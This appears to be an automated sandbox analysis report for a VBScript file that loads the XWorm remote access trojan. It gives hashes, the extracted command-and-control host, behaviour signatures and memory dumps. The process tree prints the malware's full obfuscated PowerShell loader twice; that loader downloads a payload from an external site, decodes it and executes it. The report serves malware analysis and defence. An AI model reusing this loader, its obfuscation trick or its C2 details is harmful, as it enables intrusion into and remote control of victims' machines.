Overview

overview

10

Static

static

1

file.vbs

windows7-x64

10

file.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 16:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.vbs

  • Size

    72KB

  • MD5

    7c89c3540caaa52052018271109f6a9a

  • SHA1

    78c973d9ab8326fbbacb11b7c5d8492030f8e3c4

  • SHA256

    9fde917e0e590e34264a37918d73be9645301cd68793cf28bbb8430dd1a6fed2

  • SHA512

    83750d0d142d8f3b7a6ce6edb304576561e2d5db69b0e6afd088f24af4a1b00abf49224a5227b1106b39734fef18ed1c87f45b210d1ac989d496d59c685e3bf1

  • SSDEEP

    1536:+gcBy6Tr/S2UT3WnyhNZvaOh9jWoAYz1P74QhblEiAGTC:+qs7UTGncNZvX9K450Qx8GTC

Score
10/10
xwormrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

xwormmom53.duckdns.org:8896

Mutex

EXwKoBFFWMorKcFJ

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsoSad.eg,nexhrDi.soaSyntamLandbm Flori .ovenQ.estgUnder)Massa ');$Chalybean=$Maalerudstyr[0];Nassedes (Jammerklagen 'Afgrn$MaartgWeen.lM,ddeo Unhib F,ldaAntipl Komb:AtomiTM erer H,ckaperp n,mnumsP,shrc InseePapirn typid depoeAn corSlaveeSynchdPleace ReklsWalky= vacuNPerc,eSkarpw Omsk-S.attOspyd,bFalskjunifoeSw.rmcKo,ultPrsid Arg,mSDecliyLavatsobligtPsecneAfvejmRed.o.Na.huNIntroeMargetLiged.DasypWk.ekie .lamb njuCsubcrlBailoiYlvabeOsc en,rogetYappi ');Nassedes (Jammerklagen 'Uniso$GuardT WindrSphy aExotrnPleths yddcCiliceUdskrnArkivdShakseMewlsrHftigeTek.tdNon,peTh.las,hodo. orayHAndreeAteetaFgtekdSpendeUnexprGeners peda[Holdu$RandpHVesteyJelabdGarvnrFu ktoKrongsGastia Re tlTillgtBi.ho2Bowli2 Ge e3Kryb ]Advok= dame$Hill KKontoi owncrBaronkTydnieDa iegKnackaSkrifnMer eg ExogeSidst ');$Toksikologerne=Jammerklagen 'ex.crTSchizrCentra ,ragnBush,sRe.arcJgerseTilsvnMiratd Ok ueFertirPaeaneSkra,dFaitheUd iks W,re. hemaD.raktoJaz.bwReskonZorrol GospoPas.aaAu.cadVarmeF Sem,i.noffl.inceeVil a(Canno$UnchaC SammhFarvaaUntatlAspa.y AntibBiv,aeReobla riftnSingi,organ$Doge,MMeds.eSrge,t.erruaK.bellHoldnt ChidrGym,oaKra,va Gn wdOmfly)Aa en ';$Toksikologerne=$Lordswike[1]+$Toksikologerne;$Metaltraad=$Lordswike[0];Nassedes (Jammerklagen 'Suc e$GlairgBetjelIntrao .ilib Hyrea Un.rlAlm c:PartiJMinoreKnsf,naleneh Svi.aTurneaHeartrGe,neePathonForageKranssTugt,=S,rub( ynocTSyba eHenresIndhotXipho- espiPMu,icaSndertMeta h,ucle trigo$BrevbM Blg eRelant RimeaWarfalmajust hmerInsenaScylla,pistdster.)Amora ');while (!$Jenhaarenes) {Nassedes (Jammerklagen 'Op,ld$T,nglgSyndelStelloJemadbDisseaSkoldl Afhu: PapiL nderaIndd n Flo dDefl.mWavenaHeternm.xitdComdasjan.tbsammeaTerpenAdjunkTootheTropsnMan.as Udma= Stt,$It,tatC.nterRe,seuSpewie Sprj ') ;Nassedes $Toksikologerne;Nassedes (Jammerklagen 'IrakeSSammetMelanaStatsrt.iblt,emil- SvedS Betrlforsre CucueDommepAnska M,se4 Syda ');Nassedes (Jammerklagen 'Volit$Ha,rbgNissil PlasoBond bImpanaCondilHobby: CompJBeguneLocianToetah Sanda C.llaBrn,erdatabep ramnRealie i,cisXalos=Forla(EphesTDebutemiscosaffjet Resp-Mor.aPL guna SingtA,rinh Prog Inval$VognmMUnp.oePolygt ContaUd,rnlSkil tFor,rrUncora Netva St,idEmbla)Amphi ') ;Nassedes (Jammerklagen ' .ent$FertigEnchalGteh,oSvartb,etalaSexollE.est:br.byH Afseam.harmVindem,ynneo.nbric.risikUkvall ndeniCochakBossieUncou=Mampu$ T.psgPrer,lwill oTautibSulf.aUpb nlLiber:H.nneClegeghAdnera,btusyOffenrTuriso Ag eoPoisot Indu+Skrt,+Stand%Drn e$ AltsM Uafha op.raNydenlFeltseFo.mirLymp,ustramdMargasVens,t IndryRollerFum r.Mar.ic onodoDruekuP.mprnSkrddtBourb ') ;$Chalybean=$Maalerudstyr[$Hammocklike];}$socialdemokratierne=340816;$glossina=29883;Nassedes (Jammerklagen 'Rumin$ draag,arzalnordyoVe.etbForhjaDecimlDgnbe:Au.piA RevlnPaknitc,nsuiSatircMvre.iUd ispRhap.aS,gehnMisbrt.kseh Stil= Refl bundGEylhoeFe.ietMaane-FrimeCFad,roYamamn totttPar,ie PerlnSubpattraci C,rer$FosteMAteete InextAltinaDuplilEngrotOmeg rNeomiaSkelsaKo,ladUnder ');Nassedes (Jammerklagen 'Prisk$BizengAnkyllCo,tooN tiobSaccha ,thylLacci:RecurBO,iemaRhapsnEryngk atrokIntera AphrssyndesBostte Sik r W,theKvadrr Sh.m Meta= Micr Bewil[SjussS Pally S lvsHemiltStatuest.ipm Stni.Qu veCSuperoRarebn BlvevCyngheAlarmrEnsmathvidv]Boble: Ko,r:ManuaFFulmirBes ioDe.olmNeelaBUnd,ra OmphsinosieSpnd,6Docum4SerabSMrnent IntrrPsykoifo.ernFaldbgStr e(F.sil$dobb,AAr.henAstiatVerd,iKl.vecGalaci santpTransaStrubnVensktOmstn)Tandk ');Nassedes (Jammerklagen 'Grund$ AnabgKrt gl Gla.o BirtbMorala H ndlBrahm:Morg,RBrahmeIn.erg HulliJdisktNonoizPourpe Udsksel es blksp=Nonvo Bilia[ ParmS Le.tyKernes SelvtSneryeFer,umraasa. Op aT Dugfe Hue,xPhytitNdven.,idacEPotionFlambc AdiaoCalildCentri Titen Silkg.ntro]Skol : ragi:HalvaASloveS dsprCDrejeIVifteI Ideo.p nerGReconeTrinitRdnbbSEr,nttIntelr F rkiD stenEugeng M,ll(Keram$ Ce,tBFrasaa Kon nK,avikCirc,k Her aCan,sseftersProtoeLatisrOrangeSpe.crTromb)Hand. ');Nassedes (Jammerklagen 'Intro$SelvbgVirallVildnoOmskrb,hampa LilllF,ake:basisfMyoelykroker ConfeMon ctLong sTrykl=depre$BlindRFlareeIronfgSuperiScelot Radiz Kreaescolds kyde. StotsNicaru arkvbE ders Udf tNitterRovetiApplenPhrasgKonce(textu$SkeptsOmsa,oPlutec SceniOutmaa ottel.ndkbdSaloneAmphimMea.ioO.holkForrerGoos.a spertFremmiIronie SagtrPh.lanAnkereM rcu,Appli$ PropgStartlBy ano AflysRud.isPoleriUtaknnOvergaLig.t)Org a ');Nassedes $fyrets;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"
        3⤵
          PID:4124
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsoSad.eg,nexhrDi.soaSyntamLandbm Flori .ovenQ.estgUnder)Massa ');$Chalybean=$Maalerudstyr[0];Nassedes (Jammerklagen 'Afgrn$MaartgWeen.lM,ddeo Unhib F,ldaAntipl Komb:AtomiTM erer H,ckaperp n,mnumsP,shrc InseePapirn typid depoeAn corSlaveeSynchdPleace ReklsWalky= vacuNPerc,eSkarpw Omsk-S.attOspyd,bFalskjunifoeSw.rmcKo,ultPrsid Arg,mSDecliyLavatsobligtPsecneAfvejmRed.o.Na.huNIntroeMargetLiged.DasypWk.ekie .lamb njuCsubcrlBailoiYlvabeOsc en,rogetYappi ');Nassedes (Jammerklagen 'Uniso$GuardT WindrSphy aExotrnPleths yddcCiliceUdskrnArkivdShakseMewlsrHftigeTek.tdNon,peTh.las,hodo. orayHAndreeAteetaFgtekdSpendeUnexprGeners peda[Holdu$RandpHVesteyJelabdGarvnrFu ktoKrongsGastia Re tlTillgtBi.ho2Bowli2 Ge e3Kryb ]Advok= dame$Hill KKontoi owncrBaronkTydnieDa iegKnackaSkrifnMer eg ExogeSidst ');$Toksikologerne=Jammerklagen 'ex.crTSchizrCentra ,ragnBush,sRe.arcJgerseTilsvnMiratd Ok ueFertirPaeaneSkra,dFaitheUd iks W,re. hemaD.raktoJaz.bwReskonZorrol GospoPas.aaAu.cadVarmeF Sem,i.noffl.inceeVil a(Canno$UnchaC SammhFarvaaUntatlAspa.y AntibBiv,aeReobla riftnSingi,organ$Doge,MMeds.eSrge,t.erruaK.bellHoldnt ChidrGym,oaKra,va Gn wdOmfly)Aa en ';$Toksikologerne=$Lordswike[1]+$Toksikologerne;$Metaltraad=$Lordswike[0];Nassedes (Jammerklagen 'Suc e$GlairgBetjelIntrao .ilib Hyrea Un.rlAlm c:PartiJMinoreKnsf,naleneh Svi.aTurneaHeartrGe,neePathonForageKranssTugt,=S,rub( ynocTSyba eHenresIndhotXipho- espiPMu,icaSndertMeta h,ucle trigo$BrevbM Blg eRelant RimeaWarfalmajust hmerInsenaScylla,pistdster.)Amora ');while (!$Jenhaarenes) {Nassedes (Jammerklagen 'Op,ld$T,nglgSyndelStelloJemadbDisseaSkoldl Afhu: PapiL nderaIndd n Flo dDefl.mWavenaHeternm.xitdComdasjan.tbsammeaTerpenAdjunkTootheTropsnMan.as Udma= Stt,$It,tatC.nterRe,seuSpewie Sprj ') ;Nassedes $Toksikologerne;Nassedes (Jammerklagen 'IrakeSSammetMelanaStatsrt.iblt,emil- SvedS Betrlforsre CucueDommepAnska M,se4 Syda ');Nassedes (Jammerklagen 'Volit$Ha,rbgNissil PlasoBond bImpanaCondilHobby: CompJBeguneLocianToetah Sanda C.llaBrn,erdatabep ramnRealie i,cisXalos=Forla(EphesTDebutemiscosaffjet Resp-Mor.aPL guna SingtA,rinh Prog Inval$VognmMUnp.oePolygt ContaUd,rnlSkil tFor,rrUncora Netva St,idEmbla)Amphi ') ;Nassedes (Jammerklagen ' .ent$FertigEnchalGteh,oSvartb,etalaSexollE.est:br.byH Afseam.harmVindem,ynneo.nbric.risikUkvall ndeniCochakBossieUncou=Mampu$ T.psgPrer,lwill oTautibSulf.aUpb nlLiber:H.nneClegeghAdnera,btusyOffenrTuriso Ag eoPoisot Indu+Skrt,+Stand%Drn e$ AltsM Uafha op.raNydenlFeltseFo.mirLymp,ustramdMargasVens,t IndryRollerFum r.Mar.ic onodoDruekuP.mprnSkrddtBourb ') ;$Chalybean=$Maalerudstyr[$Hammocklike];}$socialdemokratierne=340816;$glossina=29883;Nassedes (Jammerklagen 'Rumin$ draag,arzalnordyoVe.etbForhjaDecimlDgnbe:Au.piA RevlnPaknitc,nsuiSatircMvre.iUd ispRhap.aS,gehnMisbrt.kseh Stil= Refl bundGEylhoeFe.ietMaane-FrimeCFad,roYamamn totttPar,ie PerlnSubpattraci C,rer$FosteMAteete InextAltinaDuplilEngrotOmeg rNeomiaSkelsaKo,ladUnder ');Nassedes (Jammerklagen 'Prisk$BizengAnkyllCo,tooN tiobSaccha ,thylLacci:RecurBO,iemaRhapsnEryngk atrokIntera AphrssyndesBostte Sik r W,theKvadrr Sh.m Meta= Micr Bewil[SjussS Pally S lvsHemiltStatuest.ipm Stni.Qu veCSuperoRarebn BlvevCyngheAlarmrEnsmathvidv]Boble: Ko,r:ManuaFFulmirBes ioDe.olmNeelaBUnd,ra OmphsinosieSpnd,6Docum4SerabSMrnent IntrrPsykoifo.ernFaldbgStr e(F.sil$dobb,AAr.henAstiatVerd,iKl.vecGalaci santpTransaStrubnVensktOmstn)Tandk ');Nassedes (Jammerklagen 'Grund$ AnabgKrt gl Gla.o BirtbMorala H ndlBrahm:Morg,RBrahmeIn.erg HulliJdisktNonoizPourpe Udsksel es blksp=Nonvo Bilia[ ParmS Le.tyKernes SelvtSneryeFer,umraasa. Op aT Dugfe Hue,xPhytitNdven.,idacEPotionFlambc AdiaoCalildCentri Titen Silkg.ntro]Skol : ragi:HalvaASloveS dsprCDrejeIVifteI Ideo.p nerGReconeTrinitRdnbbSEr,nttIntelr F rkiD stenEugeng M,ll(Keram$ Ce,tBFrasaa Kon nK,avikCirc,k Her aCan,sseftersProtoeLatisrOrangeSpe.crTromb)Hand. ');Nassedes (Jammerklagen 'Intro$SelvbgVirallVildnoOmskrb,hampa LilllF,ake:basisfMyoelykroker ConfeMon ctLong sTrykl=depre$BlindRFlareeIronfgSuperiScelot Radiz Kreaescolds kyde. StotsNicaru arkvbE ders Udf tNitterRovetiApplenPhrasgKonce(textu$SkeptsOmsa,oPlutec SceniOutmaa ottel.ndkbdSaloneAmphimMea.ioO.holkForrerGoos.a spertFremmiIronie SagtrPh.lanAnkereM rcu,Appli$ PropgStartlBy ano AflysRud.isPoleriUtaknnOvergaLig.t)Org a ');Nassedes $fyrets;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:980
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"
            4⤵
              PID:1220
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:4912

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5o1m1zjt.atk.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Blanko.Pro
        Filesize

        482KB

        MD5

        5a1b718a30938cc57569037887c3c7a4

        SHA1

        186aaed9bf3ba2d64a0d532cd605648e5edff6b7

        SHA256

        d0790d9c9a95cdbe48f8a3947d351ead3d816d646213d023e35cca22995f51e1

        SHA512

        d54fd64d63fe799e7799fccf39082f1166d1e707a02a2ecec53da2a9f446deab1d4dda5e7b3e27f247521c6edfd54330f1c39016b46d1689a34f345fe7d14c42

        Download Submit
      • memory/980-39-0x0000000007F40000-0x00000000085BA000-memory.dmp
        Filesize

        6.5MB

        Download
      • memory/980-25-0x0000000005FA0000-0x0000000006006000-memory.dmp
        Filesize

        408KB

        Download
      • memory/980-40-0x0000000006C90000-0x0000000006CAA000-memory.dmp
        Filesize

        104KB

        Download
      • memory/980-41-0x00000000079A0000-0x0000000007A36000-memory.dmp
        Filesize

        600KB

        Download
      • memory/980-22-0x0000000002DB0000-0x0000000002DE6000-memory.dmp
        Filesize

        216KB

        Download
      • memory/980-23-0x0000000005900000-0x0000000005F28000-memory.dmp
        Filesize

        6.2MB

        Download
      • memory/980-24-0x00000000057D0000-0x00000000057F2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/980-42-0x00000000078C0000-0x00000000078E2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/980-26-0x0000000006010000-0x0000000006076000-memory.dmp
        Filesize

        408KB

        Download
      • memory/980-36-0x0000000006080000-0x00000000063D4000-memory.dmp
        Filesize

        3.3MB

        Download
      • memory/980-37-0x0000000006700000-0x000000000671E000-memory.dmp
        Filesize

        120KB

        Download
      • memory/980-38-0x0000000006720000-0x000000000676C000-memory.dmp
        Filesize

        304KB

        Download
      • memory/980-45-0x0000000009120000-0x000000000BB05000-memory.dmp
        Filesize

        41.9MB

        Download
      • memory/980-43-0x0000000008B70000-0x0000000009114000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/1484-46-0x00007FFE7D703000-0x00007FFE7D705000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1484-1-0x000002EDA2330000-0x000002EDA2352000-memory.dmp
        Filesize

        136KB

        Download
      • memory/1484-12-0x00007FFE7D700000-0x00007FFE7E1C1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1484-11-0x00007FFE7D700000-0x00007FFE7E1C1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1484-47-0x00007FFE7D700000-0x00007FFE7E1C1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1484-13-0x00007FFE7D700000-0x00007FFE7E1C1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1484-69-0x00007FFE7D700000-0x00007FFE7E1C1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1484-0-0x00007FFE7D703000-0x00007FFE7D705000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4912-65-0x0000000001000000-0x0000000001010000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4912-71-0x0000000022830000-0x000000002283A000-memory.dmp
        Filesize

        40KB

        Download
      • memory/4912-66-0x0000000022840000-0x00000000228DC000-memory.dmp
        Filesize

        624KB

        Download
      • memory/4912-64-0x0000000001000000-0x0000000002254000-memory.dmp
        Filesize

        18.3MB

        Download
      • memory/4912-70-0x0000000022BC0000-0x0000000022C52000-memory.dmp
        Filesize

        584KB

        Download